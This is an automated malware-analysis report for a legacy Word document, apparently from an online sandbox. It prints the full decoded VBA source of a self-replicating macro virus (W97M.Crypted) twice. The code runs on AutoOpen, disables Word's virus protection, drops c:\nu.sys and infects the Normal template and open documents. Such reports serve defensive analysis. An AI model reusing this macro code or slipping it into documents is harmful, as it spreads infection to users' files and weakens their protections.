Office (OLE) malware analysis — malicious · 8ffe7efba28e102c

MALICIOUS

Office (OLE)

50.5 KB Created: 1999-07-03 08:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: ad3a7cac1de262010f4d827a340e91c8 SHA-1: 4c69d3f13199f76a2c90c1956687da355b3850d7 SHA-256: 8ffe7efba28e102cba8af5db74bb7e42bbbb7cca7833802eaa752543f47e89d5

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute obfuscated code that attempts to write to the file system and potentially download a second-stage payload. The script attempts to import a file from 'c:\nu.sys', which is likely part of its execution chain.

Heuristics 4

ClamAV: Doc.Trojan.Bleed-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bleed-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9791 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9791 bytes
SHA-256: `b0975b4738f54acf687ced3faccfe83f64497e5413b6c95f51c674b8962bd35f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Crypted" Sub AutoOpen(): Dim jack(14) As String jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()" jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íÊ¹""""" jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False" jack(4) = "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se" jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)" jack(6) = "Ope¾ÜöÙðÎn ""cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1" jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßölì¸¾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛëº½oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys""" jack(8) = "I¾þÌèÃÐfÂ LeníñóêÛ(ActiçvÒÝçâçeDÌ¾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syÊ¼Üüs""" jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛË¹Üs(""CãÑÄÈrÄÛÌµêyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÃ¿eteLinæÆ½Åes þìáÃË26, 9½´Ô" jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜÐ¸çðËoneÚðÝÆ´Ünts(""Î¶úCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26ÞµÆ»,Ê½¸ñ 5" jack(11) = "Iåf ¹ðDay(äøÑÄNowù÷()) ¿÷= 3ÙºÖð1 ºæÆÜÓ·Then ÖMïsgà¾Æø¶BÎox ¿Ñûëº""n¿ï»ðôEVÖERÜáú kN¾ÅéÜOW nOùåÔËóTHING!""ÀÄÄ, 0,ß¶¾È½ ·ç""j¹»ÝÑACKÑøÇÌ tWOFLOWãåER /LóËÎÛÓázÀ¾¶×¶ó0/äMetúÇa""" jack(12) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äT×ØëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù" jack(13) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùÝ¸ÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs" jack(14) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb" For i = 1 To 14: vc = vc & jacky(jack(i)): Next i If ThisDocument.VBProject.VBComponents("Crypted").CodeModule.Lines(26, 1) = "" Then ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc End Sub Function jacky(c As String) For o = 1 To Len(c): z = Mid(c, o, 1) If Asc(z) > 177 Then z = "" x = x & z Next o: jacky = x & vbCr End Function ' W97M.Crypted aka W97M.Yuk written by Jack Twoflower [LineZer0]&[Metaphase] ' Processing file: /opt/analyzer/scan_staging/7d6874c885384629a3ec4c1b2ffad9fc.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3066 bytes ' Macros/VBA/Crypted - 14214 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' BoS 0x0000 ' Dim ' OptionBase ' LitDI2 0x000E ' VarDefn jack (As String) ' Line #1: ' LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()" ' LitDI2 0x0001 ' ArgsSt jack 0x0001 ' Line #2: ' LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íÊ¹""" ' LitDI2 0x0002 ' ArgsSt jack 0x0001 ' Line #3: ' LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False" ' LitDI2 0x0003 ' ArgsSt jack 0x0001 ' Line #4: ' LitStr 0x003D "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se" ' LitDI2 0x0004 ' ArgsSt jack 0x0001 ' Line #5: ' LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)" ' LitDI2 0x0005 ' ... (truncated)

SHA-256: b0975b4738f54acf687ced3faccfe83f64497e5413b6c95f51c674b8962bd35f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Crypted"
Sub AutoOpen(): Dim jack(14) As String
jack(1) = "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
jack(2) = "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç""AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë """"CrÊy½pt¸òeÒdÞ´íÊ¹"""""
jack(3) = "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
jack(4) = "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se"
jack(5) = "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents(""CrºÌypàtedÔ¾Ñóø""ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
jack(6) = "Ope¾ÜöÙðÎn ""cËÓíÍ¶ê:ì\nÛÚÜ´ÍuÅô.sysÝ"" ¾ëÜÕFor OutÃøpÅÔÜÁu»t ÏÔîáîÓAs #ú1:öÄÙãøÈ PriùÐÍáÄnt #1, c: ÌÅëPri¾Îð×nt #1ÉÁ,¾û÷æµ ò¶ÖÂvcû:áÌÂ ó·¶çCloÃÚ×ÏÐsÚñîe Á¼#1"
jack(7) = "If Lenë(NorÅìÉéÔ¾maúÛ¹ßlTeøîËÎ¿mplúÉæatÝæe.VBPßroÑ÷Èjectí.VBüÌ¶çÆCo÷ÎþÂ¶ìm÷¸poÉne¾ÕËÂçnáõ·âts(""CrypteÇ´dûÉùÎ""Åùèâ).NÝÔaÑïÇçme) ¼ÇÌ¿ö½= 0 ÝThe¹ÅòÌÈÀnÊ× NîÀormaõÜßölì¸¾Temp¼ÀæÃÊlate.VBÙÌåýßÖPrºæÛëº½oject.¸ïVBCÜéo¼ÓÚmëøponents.ññîëImport Àû¾ëúä""c:ËÖ\nu.º×ÛÊsys"""
jack(8) = "I¾þÌèÃÐfÂ LeníñóêÛ(ActiçvÒÝçâçeDÌ¾×ÀóoÆücumëÐäeÄÕÜnt.VBõûãÁñProject.VBCo¼÷¾ÍÝmpoîØôòüÛnentsç¾¼éá(""C¾rèàÙßÄyptÝÏÇõÊüed""ØîÈ).Name)èïÏÂù = îäÂô0 ÓThenÍïÌÝì Actü¸×ÁüÕivíeåÚçDîoùÇcument.ÇÆVBProjôëØÔ¾eïÚÒ¸ÖcéÀ÷t´ðöï.óëÖVóòãíÑBComponenóÙäøöÀtÇÙÒïsÙáÂÊéË.Impüò»Øort ""c:ô½Ú\nu.syÊ¼Üüs"""
jack(9) = "ThisDüÇocumeÛênt¿.VÌüÚBPrôoµÖject.VBCompoçåènenÆÖÉ×ètÝÛË¹Üs(""CãÑÄÈrÄÛÌµêyøptÞçöÁed"")çÌüæëï.CµÀodeMåèüÎëodule.DeÐûáÎßõlÃ¿eteLinæÆ½Åes þìáÃË26, 9½´Ô"
jack(10) = "TÌìhñµisDûýûoÌÊñ´ýücumðñîÕ¸ÑenÝtµÝá¶Ïß.Ô»¾ÚÀùVBPËÁ¼ï¿roÍjeÏÓÕñÀËct.ÛÌüÔÂÛVBCoþ½ÏmpÜÐ¸çðËoneÚðÝÆ´Ünts(""Î¶úCÖryöýè¾Ð¹ptÛedÌ»ö"").êã¼ßéCodeMìóü¿ÝodîÊÒ÷Ûulãêå¶ûe.DeäÈÁleteÃLineÆs 26ÞµÆ»,Ê½¸ñ 5"
jack(11) = "Iåf ¹ðDay(äøÑÄNowù÷()) ¿÷= 3ÙºÖð1 ºæÆÜÓ·Then ÖMïsgà¾Æø¶BÎox ¿Ñûëº""n¿ï»ðôEVÖERÜáú kN¾ÅéÜOW nOùåÔËóTHING!""ÀÄÄ, 0,ß¶¾È½ ·ç""j¹»ÝÑACKÑøÇÌ tWOFLOWãåER /LóËÎÛÓázÀ¾¶×¶ó0/äMetúÇa"""
jack(12) = "If AñÝ¿êÒÜctÐiveæîæéÔàDocößóumentÊ.SavàeüÕÊÅüüd =Òé F¹åalse ×½äT×ØëÑh¸Àßúßóen AcÇèóïÊtàivþº´åÊÃeDùØëµãocumºØe½ÜÈnt.SaveAs ActíÑiveDïàÓÞÎoçÄàcÞÉáÚÄçuìmçÑÜ÷êÞent.ÑîÉãÝÆFulÓÀlName»àÔÅù"
jack(13) = "AcÍùðÑòÖtÍivÊËeÁDocuÒýÚêmùÝ¸ÖeÅåÆÕnµÉ¹´têÞç´.èõæClosÒe wdãñîó»DêÌoNotîääñÜSÎaÓveCÔÑhanã×geåÜçÙs"
jack(14) = "End ïÕØSÕ¹ÓÊuËüöÖàÄb"
For i = 1 To 14: vc = vc & jacky(jack(i)): Next i
If ThisDocument.VBProject.VBComponents("Crypted").CodeModule.Lines(26, 1) = "" Then ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 26, vc
End Sub
Function jacky(c As String)
For o = 1 To Len(c): z = Mid(c, o, 1)
If Asc(z) > 177 Then z = ""
x = x & z
Next o: jacky = x & vbCr
End Function
' W97M.Crypted aka W97M.Yuk written by Jack Twoflower [LineZer0]&[Metaphase]


' Processing file: /opt/analyzer/scan_staging/7d6874c885384629a3ec4c1b2ffad9fc.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3066 bytes
' Macros/VBA/Crypted - 14214 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' 	BoS 0x0000 
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x000E 
' 	VarDefn jack (As String)
' Line #1:
' 	LitStr 0x0022 "Sub ¶Íö¼AutçÕïÆÒoëÜclo´ÓæØsµ¶Þïe()"
' 	LitDI2 0x0001 
' 	ArgsSt jack 0x0001 
' Line #2:
' 	LitStr 0x007B "OnÜÀñ Errorê·ñº·Ã RãúÝãesume Neçðä÷ôxtø÷Ý¶ÉÌ: c Àêµñ= ßÉç"AttribøßuÚä·Øº·t¾e VÛâÏôéB_NåµÄåíame =ïÕääë ""CrÊy½pt¸òeÒdÞ´íÊ¹"""
' 	LitDI2 0x0002 
' 	ArgsSt jack 0x0001 
' Line #3:
' 	LitStr 0x003D "OptioÌÜÆÏnsÈüºçÍ.óÔòµVirusProtectiÐÜçêÇÖo¹nÕéõ¸ =¶¸ÁµØÐ False"
' 	LitDI2 0x0003 
' 	ArgsSt jack 0x0001 
' Line #4:
' 	LitStr 0x003D "Optiàons.SaÂ¿ÚvËeNoÖér´ÒëmÜalProî¿ÚmµptñáýÙà =½´Ñöµ½ FalùÐ¿se"
' 	LitDI2 0x0004 
' 	ArgsSt jack 0x0001 
' Line #5:
' 	LitStr 0x00A6 "vÛÑîc = Äß÷»ÀThÕìisDÑë»äã·ocum´ñe×ÁènóÉÖÊËüt.VBËþÉØÓProÅ¸¼½¼ÕjectÃÒÑìÞ.ÀñÙöÙVÏþßBÛßùComðúÄponents("CrºÌypàtedÔ¾Ñóø"ÏÕÀäå)ÆêÆä»µ.CodeMoÇÒãdÜ¼ûuleñÈåßé.Li¿nesÇ(1,ñÕ 25)"
' 	LitDI2 0x0005 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.